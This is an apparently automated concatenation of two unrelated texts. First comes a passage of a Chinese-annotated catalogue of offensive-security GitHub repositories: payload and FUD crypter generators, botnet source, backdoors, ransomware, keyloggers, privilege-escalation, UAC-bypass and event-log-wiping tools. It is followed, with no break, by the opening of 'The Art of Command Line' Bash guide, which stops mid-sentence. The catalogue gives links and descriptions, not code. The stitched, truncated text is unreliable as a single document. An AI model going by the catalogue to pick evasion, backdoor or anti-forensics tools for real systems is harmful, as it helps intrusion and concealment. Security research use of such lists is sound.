[mdsecactivebreach/sharpshooter](https://github.com/mdsecactivebreach/sharpshooter) Payload Generation Framework - [**836**星][28d] [C#] [pwntester/ysoserial.net](https://github.com/pwntester/ysoserial.net) 生成Payload,恶意利用不安全的 .NET 对象反序列化 - [**832**星][7m] [Go] [tiagorlampert/chaos](https://github.com/tiagorlampert/chaos) a PoC that allow generate payloads and control remote operating system - [**752**星][1y] [Py] [oddcod3/phantom-evasion](https://github.com/oddcod3/phantom-evasion) Python AV evasion tool capable to generate FUD executable even with the most common 32 bit metasploit payload(exe/elf/dmg/apk) - [**713**星][6d] [Py] [sevagas/macro_pack](https://github.com/sevagas/macro_pack) 自动生成并混淆MS 文档, 用于渗透测试、演示、社会工程评估等 - [**634**星][2d] [C] [thewover/donut](https://github.com/thewover/donut) Generates x86, x64, or AMD64+x86 position-independent shellcode that loads .NET Assemblies, PE files, and other Windows payloads from memory and runs them with parameters - [**633**星][8m] [Shell] [g0tmi1k/msfpc](https://github.com/g0tmi1k/msfpc) MSFvenom Payload Creator (MSFPC) - [**419**星][27d] [Perl] [chinarulezzz/pixload](https://github.com/chinarulezzz/pixload) Image Payload Creating/Injecting tools - [**301**星][8m] [Py] [0xacb/viewgen](https://github.com/0xacb/viewgen) viewgen is a ViewState tool capable of generating both signed and encrypted payloads with leaked validation keys - [**278**星][1y] [Java] [ewilded/shelling](https://github.com/ewilded/shelling) SHELLING - a comprehensive OS command injection payload generator - [**268**星][1y] [Shell] [abedalqaderswedan1/aswcrypter](https://github.com/abedalqaderswedan1/aswcrypter) An Bash&Python Script For Generating Payloads that Bypasses All Antivirus so far [FUD] ### <a id="c45a90ab810d536a889e4e2dd45132f8"></a>Botnet&&僵尸网络 - [**3747**星][4m] [Py] [malwaredllc/byob](https://github.com/malwaredllc/byob) BYOB (Build Your Own Botnet) - [**2163**星][1y] [C++] [maestron/botnets](https://github.com/maestron/botnets) This is a collection of #botnet source codes, unorganized. For EDUCATIONAL PURPOSES ONLY - [**412**星][1m] [C++] [souhardya/uboat](https://github.com/souhardya/uboat) HTTP Botnet Project - [**328**星][6m] [Go] [saturnsvoid/gobot2](https://github.com/saturnsvoid/gobot2) Second Version of The GoBot Botnet, But more advanced. ### <a id="b6efee85bca01cde45faa45a92ece37f"></a>后门&&添加后门 - [**386**星][8m] [C] [zerosum0x0/smbdoor](https://github.com/zerosum0x0/smbdoor) Windows kernel backdoor via registering a malicious SMB handler - [**378**星][3m] [Shell] [screetsec/vegile](https://github.com/screetsec/vegile) This tool will setting up your backdoor/rootkits when backdoor already setup it will be hidden your spesisifc process,unlimited your session in metasploit and transparent. Even when it killed, it will re-run again. There always be a procces which while run another process,So we can assume that this procces is unstopable like a Ghost in The Shell - [**370**星][8m] [Py] [s0md3v/cloak](https://github.com/s0md3v/Cloak) Cloak can backdoor any python script with some tricks. - [**349**星][15d] [Shell] [r00t-3xp10it/backdoorppt](https://github.com/r00t-3xp10it/backdoorppt) 将Exe格式Payload伪装成Doc(.ppt) - [**348**星][9d] [C] [cr4sh/smmbackdoor](https://github.com/cr4sh/smmbackdoor) System Management Mode backdoor for UEFI - [**318**星][1y] [Ruby] [carletonstuberg/browser-backdoor](https://github.com/CarletonStuberg/browser-backdoor) BrowserBackdoor is an Electron Application with a JavaScript WebSocket Backdoor and a Ruby Command-Line Listener - [**301**星][4m] [C#] [mvelazc0/defcon27_csharp_workshop](https://github.com/mvelazc0/defcon27_csharp_workshop) Writing custom backdoor payloads with C# - Defcon 27 - [**205**星][9m] [C] [paradoxis/php-backdoor](https://github.com/Paradoxis/PHP-Backdoor) Your interpreter isn’t safe anymore  —  The PHP module backdoor ### <a id="85bb0c28850ffa2b4fd44f70816db306"></a>混淆器&&Obfuscate - [**3676**星][3d] [TS] [javascript-obfuscator/javascript-obfuscator](https://github.com/javascript-obfuscator/javascript-obfuscator) A powerful obfuscator for JavaScript and Node.js - [**2477**星][11m] [C#] [yck1509/confuserex](https://github.com/yck1509/confuserex) An open-source, free protector for .NET applications - [**1397**星][9m] [PS] [danielbohannon/invoke-obfuscation](https://github.com/danielbohannon/invoke-obfuscation) PowerShell Obfuscator - [**1147**星][8m] [hikariobfuscator/hikari](https://github.com/HikariObfuscator/Hikari) LLVM Obfuscator - [**1021**星][1m] [Swift] [rockbruno/swiftshield](https://github.com/rockbruno/swiftshield) wift/OBJ-C Obfuscator - [**676**星][1m] [C#] [obfuscar/obfuscar](https://github.com/obfuscar/obfuscar) Open source obfuscation tool for .NET assemblies - [**675**星][7m] [C++] [gossip-sjtu/armariris](https://github.com/gossip-sjtu/armariris) 孤挺花(Armariris) -- 由上海交通大学密码与计算机安全实验室维护的LLVM混淆框架 - [**653**星][6m] [Go] [yawning/obfs4](https://github.com/yawning/obfs4) The obfourscator (Courtesy mirror) - [**482**星][3m] [Py] [bashfuscator/bashfuscator](https://github.com/bashfuscator/bashfuscator) A fully configurable and extendable Bash obfuscation framework. This tool is intended to help both red team and blue team. - [**467**星][2m] [LLVM] [jonathansalwan/tigress_protection](https://github.com/jonathansalwan/tigress_protection) Playing with the Tigress binary protection. Break some of its protections and solve some of its challenges. Automatic deobfuscation using symbolic execution, taint analysis and LLVM. - [**458**星][1m] [PHP] [pk-fr/yakpro-po](https://github.com/pk-fr/yakpro-po) YAK Pro - Php Obfuscator - [**423**星][11m] [Py] [d4vinci/cuteit](https://github.com/d4vinci/cuteit) IP obfuscator made to make a malicious ip a bit cuter - [**420**星][5d] [Py] [dashingsoft/pyarmor](https://github.com/dashingsoft/pyarmor) A tool used to obfuscate python scripts, bind obfuscated scripts to fixed machine or expire obfuscated scripts. - [**394**星][1y] [Py] [essandess/isp-data-pollution](https://github.com/essandess/isp-data-pollution) ISP Data Pollution to Protect Private Browsing History with Obfuscation - [**348**星][1y] [C] [codermjlee/mjcodeobfuscation](https://github.com/codermjlee/mjcodeobfuscation) 一个用于代码混淆和字符串加密的Mac小Demo - [**337**星][22d] [Go] [unixpickle/gobfuscate](https://github.com/unixpickle/gobfuscate) Obfuscate Go binaries and packages - [**311**星][3m] [PHP] [elfsundae/laravel-hashid](https://github.com/elfsundae/laravel-hashid) Obfuscate your data by generating reversible, non-sequential, URL-safe identifiers. - [**282**星][29d] [Py] [hnfull/intensio-obfuscator](https://github.com/hnfull/intensio-obfuscator) Obfuscate a python code 2.x and 3.x - [**276**星][5d] [TS] [javascript-obfuscator/webpack-obfuscator](https://github.com/javascript-obfuscator/webpack-obfuscator) javascript-obfuscator plugin for Webpack - [**263**星][6m] [C++] [d35ha/callobfuscator](https://github.com/d35ha/callobfuscator) Obfuscate specific windows apis with different apis - [**263**星][4m] [ObjC] [preemptive/ppios-rename](https://github.com/preemptive/ppios-rename) Symbol obfuscator for iOS apps - [**235**星][21d] [C#] [xenocoderce/neo-confuserex](https://github.com/xenocoderce/neo-confuserex) Updated ConfuserEX, an open-source, free obfuscator for .NET applications - [**202**星][6m] [C#] [bedthegod/confuserex-mod-by-bed](https://github.com/bedthegod/confuserex-mod-by-bed) Beds Protector | Best free obfuscation out right now ### <a id="78d0ac450a56c542e109c07a3b0225ae"></a>Payload管理 ### <a id="d08b7bd562a4bf18275c63ffe7d8fc91"></a>勒索软件 - [**391**星][1y] [Go] [mauri870/ransomware](https://github.com/mauri870/ransomware) A POC Windows crypto-ransomware (Academic) - [**331**星][t] [Batchfile] [mitchellkrogza/ultimate.hosts.blacklist](https://github.com/mitchellkrogza/ultimate.hosts.blacklist) The Ultimate Unified Hosts file for protecting your network, computer, smartphones and Wi-Fi devices against millions of bad web sites. Protect your children and family from gaining access to bad web sites and protect your devices and pc from being infected with Malware or Ransomware. ### <a id="82f546c7277db7919986ecf47f3c9495"></a>键盘记录器&&Keylogger - [**710**星][8m] [Py] [giacomolaw/keylogger](https://github.com/giacomolaw/keylogger) A simple keylogger for Windows, Linux and Mac - [**462**星][1y] [Py] [mehulj94/radium](https://github.com/mehulj94/Radium) Python keylogger with multiple features. - [**364**星][12m] [Py] [ajinabraham/xenotix-python-keylogger](https://github.com/ajinabraham/xenotix-python-keylogger) Xenotix Python Keylogger for Windows. ### <a id="8f99087478f596139922cd1ad9ec961b"></a>Meterpreter - [**244**星][1m] [Py] [mez0cc/ms17-010-python](https://github.com/mez0cc/ms17-010-python) MS17-010: Python and Meterpreter ### <a id="63e0393e375e008af46651a3515072d8"></a>Payload投递 - [**263**星][4m] [Py] [no0be/dnslivery](https://github.com/no0be/dnslivery) Easy files and payloads delivery over DNS *** ## <a id="0b644b2d8119abf6643755ef455fcf2c"></a>文章 ### <a id="27962a7633b86d43cae2dd2d4c32f1b6"></a>新添加 # <a id="a9494547a9359c60f09aea89f96a2c83"></a>后渗透 *** ## <a id="3ed50213c2818f1455eff4e30372c542"></a>工具 ### <a id="12abc279c69d1fcf10692b9cb89bcdf7"></a>未分类-post-exp - [**7035**星][t] [C] [hashcat/hashcat](https://github.com/hashcat/hashcat) 世界上最快最先进的密码恢复工具 - 重复区段: [密码->工具->密码](#86dc226ae8a71db10e4136f4b82ccd06) | - [**3369**星][8d] [C] [screetsec/thefatrat](https://github.com/screetsec/thefatrat) Thefatrat a massive exploiting tool : Easy tool to generate backdoor and easy tool to post exploitation attack like browser attack and etc . This tool compiles a malware with popular payload and then the compiled malware can be execute on windows, android, mac . The malware that created with this tool also have an ability to bypass most AV softw… - 重复区段: [Payload->工具->Payload生成](#ad92f6b801a18934f1971e2512f5ae4f) | - [**2479**星][1m] [Shell] [rebootuser/linenum](https://github.com/rebootuser/linenum) Scripted Local Linux Enumeration & Privilege Escalation Checks - [**2171**星][1m] [Py] [commixproject/commix](https://github.com/commixproject/commix) Automated All-in-One OS command injection and exploitation tool. - [**1243**星][10m] [C] [a0rtega/pafish](https://github.com/a0rtega/pafish) Pafish is a demonstration tool that employs several techniques to detect sandboxes and analysis environments in the same way as malware families do. - [**1225**星][1y] [C#] [cn33liz/p0wnedshell](https://github.com/cn33liz/p0wnedshell) PowerShell Runspace Post Exploitation Toolkit - [**1116**星][9m] [Py] [0x00-0x00/shellpop](https://github.com/0x00-0x00/shellpop) 在渗透中生产简易的/复杂的反向/绑定Shell - [**1062**星][2m] [Boo] [byt3bl33d3r/silenttrinity](https://github.com/byt3bl33d3r/silenttrinity) An asynchronous, collaborative post-exploitation agent powered by Python and .NET's DLR - [**1024**星][4m] [Py] [byt3bl33d3r/deathstar](https://github.com/byt3bl33d3r/deathstar) 在Active Directory环境中使用Empire自动获取域管理员权限 - [**765**星][5m] [Py] [lgandx/pcredz](https://github.com/lgandx/pcredz) This tool extracts Credit card numbers, NTLM(DCE-RPC, HTTP, SQL, LDAP, etc), Kerberos (AS-REQ Pre-Auth etype 23), HTTP Basic, SNMP, POP, SMTP, FTP, IMAP, etc from a pcap file or from a live interface. - [**743**星][5m] [PS] [hausec/adape-script](https://github.com/hausec/adape-script) Active Directory Assessment and Privilege Escalation Script - [**697**星][2m] [C#] [cobbr/sharpsploit](https://github.com/cobbr/sharpsploit) SharpSploit is a .NET post-exploitation library written in C# - [**422**星][16d] [Shell] [thesecondsun/bashark](https://github.com/thesecondsun/bashark) Bash post exploitation toolkit - [**344**星][5m] [Py] [adrianvollmer/powerhub](https://github.com/adrianvollmer/powerhub) A post exploitation tool based on a web application, focusing on bypassing endpoint protection and application whitelisting - [**282**星][1y] [JS] [chrisallenlane/novahot](https://github.com/chrisallenlane/novahot) Webshell框架,实现了基于Json的API,可与任何语言编写的后门(默认支持PHP/Ruby/Python)进行通信。 - [**233**星][2d] [Go] [brompwnie/botb](https://github.com/brompwnie/botb) A container analysis and exploitation tool for pentesters and engineers. - [**204**星][2m] [Py] [elevenpaths/ibombshell](https://github.com/elevenpaths/ibombshell) Tool to deploy a post-exploitation prompt at any time ### <a id="4c2095e7e192ac56f6ae17c8fc045c51"></a>提权&&PrivilegeEscalation - [**3699**星][5m] [C] [secwiki/windows-kernel-exploits](https://github.com/secwiki/windows-kernel-exploits) windows-kernel-exploits Windows平台提权漏洞集合 - [**1283**星][3m] [Py] [alessandroz/beroot](https://github.com/alessandroz/beroot) Privilege Escalation Project - Windows / Linux / Mac - [**638**星][11m] [C++] [ohpe/juicy-potato](https://github.com/ohpe/juicy-potato) A sugared version of RottenPotatoNG, with a bit of juice, i.e. another Local Privilege Escalation tool, from a Windows Service Accounts to NT AUTHORITY\SYSTEM. - [**547**星][5m] [rhinosecuritylabs/aws-iam-privilege-escalation](https://github.com/rhinosecuritylabs/aws-iam-privilege-escalation) A centralized source of all AWS IAM privilege escalation methods released by Rhino Security Labs. - [**496**星][8m] [Py] [initstring/dirty_sock](https://github.com/initstring/dirty_sock) Linux privilege escalation exploit via snapd (CVE-2019-7304) - [**492**星][2m] [C#] [rasta-mouse/watson](https://github.com/rasta-mouse/watson) Enumerate missing KBs and suggest exploits for useful Privilege Escalation vulnerabilities - [**485**星][8m] [C] [nongiach/sudo_inject](https://github.com/nongiach/sudo_inject) [Linux] Two Privilege Escalation techniques abusing sudo token - [**392**星][4m] [PS] [cyberark/aclight](https://github.com/cyberark/ACLight) A script for advanced discovery of Privileged Accounts - includes Shadow Admins - [**371**星][3m] [PS] [gdedrouas/exchange-ad-privesc](https://github.com/gdedrouas/exchange-ad-privesc) Exchange privilege escalations to Active Directory - [**340**星][2m] [Shell] [nullarray/roothelper](https://github.com/nullarray/roothelper) 辅助在被攻克系统上的提权过程:自动枚举、下载、解压并执行提权脚本 - [**308**星][5m] [Batchfile] [frizb/windows-privilege-escalation](https://github.com/frizb/windows-privilege-escalation) Windows Privilege Escalation Techniques and Scripts - [**269**星][4m] [PHP] [lawrenceamer/0xsp-mongoose](https://github.com/lawrenceamer/0xsp-mongoose) Privilege Escalation Enumeration Toolkit (64/32 ) , fast , intelligent enumeration with Web API integration . Mastering Your Own Finding - [**223**星][3m] [Py] [initstring/uptux](https://github.com/initstring/uptux) Linux privilege escalation checks (systemd, dbus, socket fun, etc) - [**222**星][4d] [C#] [carlospolop/privilege-escalation-awesome-scripts-suite](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) PEASS - Privilege Escalation Awesome Scripts SUITE (with colors) - [**222**星][4d] [C#] [carlospolop/privilege-escalation-awesome-scripts-suite](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) PEASS - Privilege Escalation Awesome Scripts SUITE (with colors) ### <a id="caab36bba7fa8bb931a9133e37d397f6"></a>Windows #### <a id="7ed8ee71c4a733d5e5e5d239f0e8b9e0"></a>未分类-Windows - [**8785**星][28d] [C] [gentilkiwi/mimikatz](https://github.com/gentilkiwi/mimikatz) A little tool to play with Windows security - [**2153**星][2m] [Py] [trustedsec/unicorn](https://github.com/trustedsec/unicorn) 通过PowerShell降级攻击, 直接将Shellcode注入到内存 - [**2045**星][13d] [C++] [darthton/blackbone](https://github.com/darthton/blackbone) Windows memory hacking library - [**999**星][11m] [Batchfile] [sagishahar-zz/lpeworkshop](https://github.com/sagishahar-zz/lpeworkshop) Windows / Linux Local Privilege Escalation Workshop - [**931**星][6d] [C#] [googleprojectzero/sandbox-attacksurface-analysis-tools](https://github.com/googleprojectzero/sandbox-attacksurface-analysis-tools) 沙箱攻击面(Attack Surface)分析工具,用于测试 Windows 上沙箱的各种属性 - [**700**星][8m] [C] [hfiref0x/tdl](https://github.com/hfiref0x/tdl) Driver loader for bypassing Windows x64 Driver Signature Enforcement - [**694**星][5m] [C#] [outflanknl/evilclippy](https://github.com/outflanknl/evilclippy) A cross-platform assistant for creating malicious MS Office documents. Can hide VBA macros, stomp VBA code (via P-Code) and confuse macro analysis tools. Runs on Linux, OSX and Windows. - [**611**星][9m] [C#] [0xbadjuju/tokenvator](https://github.com/0xbadjuju/tokenvator) A tool to elevate privilege with Windows Tokens - [**519**星][12m] [PS] [a-min3/winspect](https://github.com/a-min3/winspect) Powershell-based Windows Security Auditing Toolbox - [**416**星][1m] [C++] [hoshimin/kernel-bridge](https://github.com/hoshimin/kernel-bridge) Windows kernel hacking framework, driver template, hypervisor and API written on C++ - [**391**星][2m] [Java] [tiagorlampert/saint](https://github.com/tiagorlampert/saint) a Spyware Generator for Windows systems written in Java - [**349**星][2m] [Shell] [orlikoski/skadi](https://github.com/orlikoski/Skadi) collection, processing and advanced analysis of forensic artifacts and images. - [**341**星][1y] [C++] [qax-a-team/eventcleaner](https://github.com/QAX-A-Team/EventCleaner) A tool mainly to erase specified records from Windows event logs, with additional functionalities. - [**340**星][19d] [C] [mattiwatti/efiguard](https://github.com/mattiwatti/efiguard) Disable PatchGuard and DSE at boot time - [**302**星][2d] [Py] [skylined/bugid](https://github.com/skylined/bugid) Detect, analyze and uniquely identify crashes in Windows applications - [**298**星][1y] [PS] [onelogicalmyth/zeroday-powershell](https://github.com/onelogicalmyth/zeroday-powershell) A PowerShell example of the Windows zero day priv esc - [**290**星][7m] [Py] [ropnop/windapsearch](https://github.com/ropnop/windapsearch) Python script to enumerate users, groups and computers from a Windows domain through LDAP queries - [**288**星][11m] [maaaaz/impacket-examples-windows](https://github.com/maaaaz/impacket-examples-windows) The great impacket example scripts compiled for Windows - [**213**星][4m] [PHP] [rizer0/log-killer](https://github.com/rizer0/log-killer) Clear all your logs in [linux/windows] servers - [**212**星][1m] [C++] [can1357/byepg](https://github.com/can1357/byepg) Defeating Patchguard universally for Windows 8, Windows 8.1 and all versions of Windows 10 regardless of HVCI - [**211**星][1y] [C++] [tandasat/pgresarch](https://github.com/tandasat/pgresarch) PatchGuard Research - [**206**星][20d] [Py] [mzfr/rsh](https://github.com/mzfr/rsh) generate reverse shell from CLI for linux and Windows. - [**203**星][5d] [Py] [ropnop/impacket_static_binaries](https://github.com/ropnop/impacket_static_binaries) Standalone binaries for Linux/Windows of Impacket's examples - [**201**星][10m] [HTML] [mxmssh/drltrace](https://github.com/mxmssh/drltrace) Drltrace is a library calls tracer for Windows and Linux applications. #### <a id="58f3044f11a31d0371daa91486d3694e"></a>UAC - [**2355**星][3d] [C] [hfiref0x/uacme](https://github.com/hfiref0x/uacme) Defeating Windows User Account Control #### <a id="b84c84a853416b37582c3b7f13eabb51"></a>AppLocker #### <a id="e3c4c83dfed529ceee65040e565003c4"></a>ActiveDirectory - [**3652**星][19d] [PS] [bloodhoundad/bloodhound](https://github.com/BloodHoundAD/BloodHound) a single page Javascript web application, uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. - [**2009**星][3m] [infosecn1nja/ad-attack-defense](https://github.com/infosecn1nja/ad-attack-defense) Attack and defend active directory using modern post exploitation adversary tradecraft activity - [**338**星][9m] [Py] [dirkjanm/ldapdomaindump](https://github.com/dirkjanm/ldapdomaindump) Active Directory information dumper via LDAP - [**242**星][1y] [Go] [netspi/goddi](https://github.com/netspi/goddi) goddi (go dump domain info) dumps Active Directory domain information #### <a id="25697cca32bd8c9492b8e2c8a3a93bfe"></a>域渗透 #### <a id="a5c1d88a8e35b6c6223a6d64dbfb5358"></a>WET ### <a id="2dd40db455d3c6f1f53f8a9c25bbe63e"></a>驻留&&Persistence - [**306**星][3m] [C#] [fireeye/sharpersist](https://github.com/fireeye/sharpersist) Windows persistence toolkit ### <a id="4fc56d3dd1977b882ba14a9fd820f8e2"></a>Linux&&Xnix *** ## <a id="c86567da7d4004149912383575be3b45"></a>文章 ### <a id="fdf10af493284be94033d1350f1e9b5c"></a>新添加 # 贡献 内容为系统自动导出, 有任何问题请提issue
🌍 *[Čeština](README-cs.md) ∙ [Deutsch](README-de.md) ∙ [Ελληνικά](README-el.md) ∙ [English](README.md) ∙ [Español](README-es.md) ∙ [Français](README-fr.md) ∙ [Indonesia](README-id.md) ∙ [Italiano](README-it.md) ∙ [日本語](README-ja.md) ∙ [한국어](README-ko.md) ∙ [polski](README-pl.md) ∙ [Português](README-pt.md) ∙ [Română](README-ro.md) ∙ [Русский](README-ru.md) ∙ [Slovenščina](README-sl.md) ∙ [Українська](README-uk.md) ∙ [简体中文](README-zh.md) ∙ [繁體中文](README-zh-Hant.md)* # The Art of Command Line *Note: I'm planning to revise this and looking for a new co-author to help with expanding this into a more comprehensive guide. While it's very popular, it could be broader and a bit deeper. If you like to write and are close to being an expert on this material and willing to consider helping, please drop me a note at josh (0x40) holloway.com. –[jlevy](https://github.com/jlevy), [Holloway](https://www.holloway.com). Thank you!* - [Meta](#meta) - [Basics](#basics) - [Everyday use](#everyday-use) - [Processing files and data](#processing-files-and-data) - [System debugging](#system-debugging) - [One-liners](#one-liners) - [Obscure but useful](#obscure-but-useful) - [macOS only](#macos-only) - [Windows only](#windows-only) - [More resources](#more-resources) - [Disclaimer](#disclaimer) ![curl -s 'https://raw.githubusercontent.com/jlevy/the-art-of-command-line/master/README.md' | egrep -o '`\w+`' | tr -d '`' | cowsay -W50](cowsay.png) Fluency on the command line is a skill often neglected or considered arcane, but it improves your flexibility and productivity as an engineer in both obvious and subtle ways. This is a selection of notes and tips on using the command-line that we've found useful when working on Linux. Some tips are elementary, and some are fairly specific, sophisticated, or obscure. This page is not long, but if you can use and recall all the items here, you know a lot. This work is the result of [many authors and translators](AUTHORS.md). Some of this [originally](http://www.quora.com/What-are-some-lesser-known-but-useful-Unix-commands) [appeared](http://www.quora.com/What-are-the-most-useful-Swiss-army-knife-one-liners-on-Unix) on [Quora](http://www.quora.com/What-are-some-time-saving-tips-that-every-Linux-user-should-know), but it has since moved to GitHub, where people more talented than the original author have made numerous improvements. [**Please submit a question**](https://airtable.com/shrzMhx00YiIVAWJg) if you have a question related to the command line. [**Please contribute**](/CONTRIBUTING.md) if you see an error or something that could be better! ## Meta Scope: - This guide is for both beginners and experienced users. The goals are *breadth* (everything important), *specificity* (give concrete examples of the most common case), and *brevity* (avoid things that aren't essential or digressions you can easily look up elsewhere). Every tip is essential in some situation or significantly saves time over alternatives. - This is written for Linux, with the exception of the "[macOS only](#macos-only)" and "[Windows only](#windows-only)" sections. Many of the other items apply or can be installed on other Unices or macOS (or even Cygwin). - The focus is on interactive Bash, though many tips apply to other shells and to general Bash scripting. - It includes both "standard" Unix commands as well as ones that require special package installs -- so long as they are important enough to merit inclusion. Notes: - To keep this to one page, content is implicitly included by reference. You're smart enough to look up more detail elsewhere once you know the idea or command to Google. Use `apt`, `yum`, `dnf`, `pacman`, `pip` or `brew` (as appropriate) to install new programs. - Use [Explainshell](http://explainshell.com/) to get a helpful breakdown of what commands, options, pipes etc. do. ## Basics - Learn basic Bash. Actually, type `man bash` and at least skim the whole thing; it's pretty easy to follow and not that long. Alternate shells can be nice, but Bash is powerful and always available (learning *only* zsh, fish, etc., while tempting on your own laptop, restricts you in many situations, such as using existing servers). - Learn at least one text-based editor well. The `nano` editor is one of the simplest for basic editing (opening, editing, saving, searching). However, for the power user in a text terminal, there is no substitute for Vim (`vi`), the hard-to-learn but venerable, fast, and full-featured editor. Many people also use the classic Emacs, particularly for larger editing tasks. (Of course, any modern software developer working on an extensive project is unlikely to use only a pure text-based editor and should also be familiar with modern graphical IDEs and tools.) - Finding documentation: - Know how to read official documentation with `man` (for the inquisitive, `man man` lists the section numbers, e.g. 1 is "regular" commands, 5 is files/conventions, and 8 are for administration). Find man pages with `apropos`. - Know that some commands are not executables, but Bash builtins, and that you can get help on them with `help` and `help -d`. You can find out whether a command is an executable, shell builtin or an alias by using `type command`. - `curl cheat.sh/command` will give a brief "cheat sheet" with common examples of how to use a shell command. - Learn about redirection of output and input using `>` and `<` and pipes using `|`. Know `>` overwrites the output file and `>>` appends. Learn about stdout and stderr. - Learn about file glob expansion with `*` (and perhaps `?` and `[`...`]`) and quoting and the difference between double `"` and single `'` quotes. (See more on variable expansion below.) - Be familiar with Bash job management: `&`, **ctrl-z**, **ctrl-c**, `jobs`, `fg`, `bg`, `kill`, etc. - Know `ssh`, and the basics of passwordless authentication, via `ssh-agent`, `ssh-add`, etc. - Basic file management: `ls` and `ls -l` (in particular, learn what every column in `ls -l` means), `less`, `head`, `tail` and `tail -f` (or even better, `less +F`), `ln` and `ln -s` (learn the differences and advantages of hard versus soft links), `chown`, `chmod`, `du` (for a quick summary of disk usage: `du -hs *`). For filesystem management, `df`, `mount`, `fdisk`, `mkfs`, `lsblk`. Learn what an inode is (`ls -i` or `df -i`). - Basic network management: `ip` or `ifconfig`, `dig`, `traceroute`, `route`. - Learn and use a version control management system, such as `git`. - Know regular expressions well, and the various flags to `grep`/`egrep`. The `-i`, `-o`, `-v`, `-A`, `-B`, and `-C` options are worth knowing. - Learn to use `apt-get`, `yum`, `dnf` or `pacman` (depending on distro) to find and install packages. And make sure you have `pip` to install Python-based command-line tools (a few below are easiest to install via `pip`). ## Everyday use - In Bash, use **Tab** to complete arguments or list all available commands and **ctrl-r** to search through command history (after pressing, type to search, press **ctrl-r** repeatedly to cycle through more matches, press **Enter** to execute the found command, or hit the right arrow to put the result in the current line to allow editing). - In Bash, use **ctrl-w** to delete the last word, and **ctrl-u** to delete the content from current cursor back to the start of the line. Use **alt-b** and **alt-f** to move by word, **ctrl-a** to move cursor to beginning of line, **ctrl-e** to move cursor to end of line, **ctrl-k** to kill to the end of the line, **ctrl-l** to clear the screen. See `man readline` for all the default keybindings in Bash. There are a lot. For example **alt-.** cycles through previous arguments, and **alt-*** expands a glob. - Alternatively, if you love vi-style key-bindings, use `set -o vi` (and `set -o emacs` to put it back). - For editing long commands, after setting your editor (for example `export EDITOR=vim`), **ctrl-x** **ctrl-e** will open the current command in an editor for multi-line editing. Or in vi style, **escape-v**. - To see recent commands, use `history`. Follow with `!n` (where `n` is the command number) to execute again. There are also many abbreviations you can use, the most useful probably being `!$` for last argument and `!!` for last command (see "HISTORY EXPANSION" in the man page). However, these are often easily replaced with **ctrl-r** and **alt-.**. - Go to your home directory with `cd`. Access files relative to your home directory with the `~` prefix (e.g. `~/.bashrc`). In `sh` scripts refer to the home directory as `$HOME`. - To go back to the previous working directory: `cd -`. - If you are halfway through typing a command but change your mind, hit **alt-#** to add a `#` at the beginning and enter it as a comment (or use **ctrl-a**, **#**, **enter**). You can then return to it later via command history. - Use `xargs` (or `parallel`). It's very powerful. Note you can control how many items execute per line (`-L`) as well as parallelism (`-P`). If you're not sure if it'll do the right thing, use `xargs echo` first. Also, `-I{}` is handy. Examples: ```bash find . -name '*.py' | xargs grep some_function cat hosts | xargs -I{} ssh root@{} hostname ``` - `pstree -p` is a helpful display of the process tree. - Use `pgrep` and `pkill` to find or signal processes by name (`-f` is helpful). - Know the various signals you can send processes. For example, to suspend a process, use `kill -STOP [pid]`. For the full list, see `man 7 signal` - Use `nohup` or `disown` if you want a background process to keep running forever. - Check what processes are listening via `netstat -lntp` or `ss -plat` (for TCP; add `-u` for UDP) or `lsof -iTCP -sTCP:LISTEN -P -n` (which also works on macOS). - See also `lsof` and `fuser` for open sockets and files. - See `uptime` or `w` to know how long the system has been running. - Use `alias` to create shortcuts for commonly used commands. For example, `alias ll='ls -latr'` creates a new alias `ll`. - Save aliases, shell settings, and functions you commonly use in `~/.bashrc`, and [arrange for login shells to source it](http://superuser.com/a/183980/7106). This will make your setup available in all your shell sessions. - Put the settings of environment variables as well as commands that should be executed when you login in `~/.bash_profile`. Separate configuration will be needed for shells you launch from graphical environment logins and `cron` jobs. - Synchronize your configuration files (e.g. `.bashrc` and `.bash_profile`) among various computers with Git. - Understand that care is needed when variables and filenames include whitespace. Surround your Bash variables with quotes, e.g. `"$FOO"`. Prefer the `-0` or `-print0` options to enable null characters to delimit filenames, e.g. `locate -0 pattern | xargs -0 ls -al` or `find / -print0 -type d | xargs -0 ls -al`. To iterate on filenames containing whitespace in a for loop, set your IFS to be a newline only using `IFS=$'\n'`. - In Bash scripts, use `set -x` (or the variant `set -v`, which logs raw input, including unexpanded variables and comments) for debugging output. Use strict modes unless you have a good reason not to: Use `set -e` to abort on errors (nonzero exit code). Use `set -u` to detect unset variable usages. Consider `set -o pipefail` too, to abort on errors within pipes (though read up on it more if you do, as this topic is a bit subtle). For more involved scripts, also use `trap` on EXIT or ERR. A useful habit is to start a script like this, which will make it detect and abort on common errors and print a message: ```bash set -euo pipefail trap "echo 'error: Script failed: see failed command above'" ERR ``` - In Bash scripts, subshells (written with parentheses) are convenient ways to group commands. A common example is to temporarily move to a different working directory, e.g. ```bash # do something in current dir (cd /some/other/dir && other-command) # continue in original dir ``` - In Bash, note there are lots of kinds of variable expansion. Checking a variable exists: `${name:?error message}`. For example, if a Bash script requires a single argument, just write `input_file=${1:?usage: $0 input_file}`. Using a default value if a variable is empty: `${name:-default}`. If you want to have an additional (optional) parameter added to the previous example, you can use something like `output_file=${2:-logfile}`. If `$2` is omitted and thus empty, `output_file` will be set to `logfile`. Arithmetic expansion: `i=$(( (i + 1) % 5 ))`. Sequences: `{1..10}`. Trimming of strings: `${var%suffix}` and `${var#prefix}`. For example if `var=foo.pdf`, then `echo ${var%.pdf}.txt` prints `foo.txt`. - Brace expansion using `{`...`}` can reduce having to re-type similar text and automate combinations of items. This is helpful in examples like `mv foo.{txt,pdf} some-dir` (which moves both files), `cp somefile{,.bak}` (which expands to `cp somefile somefile.bak`) or `mkdir -p test-{a,b,c}/subtest-{1,2,3}` (which expands all possible combinations and creates a directory tree). Brace expansion is performed before any other expansion. - The order of expansions is: brace expansion; tilde expansion, parameter and variable expansion, arithmetic expansion, and command substitution (done in a left-to-right fashion); word splitting; and filename expansion. (For example, a range like `{1..20}` cannot be expressed with variables using `{$a..$b}`. Use `seq` or a `for` loop instead, e.g., `seq $a $b` or `for((i=a; i<=b; i++)); do ... ; done`.) - The output of a command can be treated like a file via `<(some command)` (known as process substitution). For example, compare local `/etc/hosts` with a remote one: ```sh diff /etc/hosts <(ssh somehost cat /etc/hosts) ``` - When writing scripts you may want to put all of your code in curly braces. If the closing brace is missing, your script will be prevented from executing due to a syntax error. This makes sense when your script is going to be downloaded from the web, since it prevents partially downloaded scripts from executing: 